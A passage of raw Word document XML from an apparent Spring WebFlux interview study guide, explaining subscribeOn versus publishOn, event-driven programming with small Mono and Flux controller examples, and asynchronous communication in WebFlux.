    <w:p w14:paraId="6E1D95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7FFE808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2 on thread: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194F0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toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9905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B42CB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and print the result on a new thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24DF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single())  // Subscribe and print on a single thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB459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Terminated on thread: " + Thread.currentThread().getName()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A9F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3BE3216B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1385D3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llow time for asynchronous operations to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CB0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read.sleep(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8BAB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F68E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5833C6"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6DBD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boundedElastic())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ECA7B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map() operation will be executed on the bounded elastic thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0CF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parallel())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3A29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next .map() operation will be executed on a different thread, as specified by publishOn(Schedulers.parallel()). The parallel() scheduler is used for CPU-bound tasks and allows operations to run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310C97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cond .map() operation will be executed on the parallel thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E329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single())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8EDC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fter the processing is completed, the final .subscribe() will be executed on a single-threaded scheduler (for demonstration purposes). This will output the final result on a single thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686DA6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ected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75D64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1 on thread: boundedElastic-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAE78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2 on thread: parallel-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C809E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rminated on thread: single</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5ADA4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LO WORLD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173A6E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CD7146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bscribeOn() affects the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the subscription, making it ideal for setting where the pipeline starts (typically used for blocking operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237AD5C"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affects the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subsequent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the stream and can be used to change the execution context for tasks that may benefit from running on a specific thread or thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D025D6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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not affect the initial thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; it only affects operations that happen </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after it</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC59D4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2E30298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subscribeOn() to control the thread for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5ED7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publishOn() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>switch execution context</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for subsequent operations, allowing you to optimize I/O and CPU-bound tasks by running them on appropriate thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421E57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319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CF978" w14:textId="387F8F1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3" w:name="_Toc197867747"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of event-driven programming in the context of Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p w14:paraId="7CB1C879" w14:textId="6DF5C7A7" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="004E6A4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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gramming in the Context of Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64CA7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Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457E14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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69469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around the concept of reactive streams. A reactive stream represents a sequence of events (data) that can be processed asynchronously. The reactive streams model defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publishers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Mono and Flux) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that handle the data asynchronously and can react to events like data arrival, completion, and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5EFB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AFA2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n event-driven system, an event loop is responsible for handling incoming events (requests) and processing them asynchronously without blocking the main thread. Spring WebFlux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o handle incoming HTTP requests and events without waiting for them to complete before continuing to process other events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC8C5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op of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ervlet 3.1+</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers, which use an event-driven, non-blocking I/O model to handle requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F914A2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rogramming Paradigm</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5FAD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reactive programming paradigm used in Spring WebFlux is inherently event-driven. It revolves around </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observables</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono and Flux), which represent streams of data that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by subscribers. These subscribers react to the data being emitted by the observable (publisher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23056AB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For example, when a user sends an HTTP request, Spring WebFlux will treat that request as an event and return a Mono or Flux that emits the response asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCC3E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Asynchronous Events</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55513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utilize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nd methods like subscribeOn() and publishOn() to control the threads on which tasks should be executed, providing fine-grained control over task scheduling and event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A923E1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0764E0BC"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event-driven programming, one of the challenges is deal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a situation where too many events arrive at once and overwhelm the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E40BF"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Handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56672D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event-driven nature is made evident through the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., HandlerFunction in functional programming style or @RestController in annotation-based programming).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F593D4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Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4A0D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xample to demonstrate how event-driven programming works in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C84FF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6F96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42A212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F45EAD8" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484F43F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Mono (single asynchronous result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF89B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hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378203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Hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D881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Hello, World!").delayElement(Duration.ofSeconds(2)); // Simulate delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E538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9C0AB13" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6FBDE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Flux (multiple asynchronous results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD479F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numbers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57E40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nteger&gt; getNumbers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3BE9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1, 2, 3, 4, 5).delayElements(Duration.ofMillis(500)); // Simulate delay between numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12430C0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3167D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F69BA9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above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628D72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just("Hello, World!")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents an event that produces a single result asynchronously. It reacts to the HTTP request and sends the response after a 2-second delay (delayElement simulates some processing time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2BCE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just(1, 2, 3, 4, 5)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents a sequence of events that produce multiple results asynchronously. The response is emitted in chunks with a delay of 500ms between each value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA59334"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cess Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D0EF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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903710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user sends an HTTP GET request to /hello or /numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14149B1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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DE6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maps the incoming HTTP request to the appropriate event handler method (getHello() or getNumbers()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE095F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andling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E71C32"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handler method returns a Mono or Flux that represents a stream of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E318BB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processing of the events happens asynchronously on a non-blocking thread, so the server can handle other incoming requests while waiting for the event results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9FEB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293D896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re is a large volume of events, Spring WebFlux handles them without overwhelming the system. The system can slow down or apply strategies to ensure the response is manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCDC8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vent Completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634218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event (response) is ready, Spring WebFlux completes the pipeline and sends the result to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6D14B"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dvantages of Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC80C40"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688AE39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allows handling multiple requests concurrently using fewer threads, reducing the need for blocking threads when waiting for I/O operations (e.g., database calls, network requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334916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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9860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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052B26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allows real-time updates by emitting events as soon as they are available, providing low-latency responses for applications like chat applications or real-time dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F91F69A"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0DAE30D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provides mechanisms for controlling backpressure, ensuring that the system remains responsive even under heavy load conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E935E3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26938A0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cause of the non-blocking nature, WebFlux can make better use of resources (CPU, memory, etc.) and can be deployed in environments with limited resources, such as cloud-native applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523F59C"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F920FD4"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320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA78727" w14:textId="2913F026"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4" w:name="_Toc197867748"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle asynchronous communication in event-driven systems</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p w14:paraId="64591759" w14:textId="15D6517F"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handles asynchronous communication in event-driven systems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which is based on non-blocking I/O. This enables it to efficiently handle a large number of concurrent events without blocking the execution thread for each request. Here's how it works in more detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1A7C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for Asynchronous Communication in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EEF74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 and Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519050A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 which defines a standard for asynchronous stream processing. This allows it to handle multiple events concurrently in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287300E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s and Subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDF3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w:t>
      </w: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xml:space="preserve"> represents a source of asynchronous events (like Mono or Flux), and the </w:t>
      </w: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xml:space="preserve"> is a consumer that reacts to the emitted values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C01A8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is used for a single asynchronous result (like a single HTTP request/response), while Flux is used for multiple asynchronous results (like a stream of data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C734A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application reacts to incoming HTTP requests as events and uses these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to handle and return results asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B51D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rchitecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C086C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treats HTTP requests as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and when an event occurs (e.g., a client sends an HTTP request), the application reacts to it asynchronously. The event is processed through a reactive pipeline, where each step is non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEF43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ch handler in WebFlux (like a controller method) can return a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
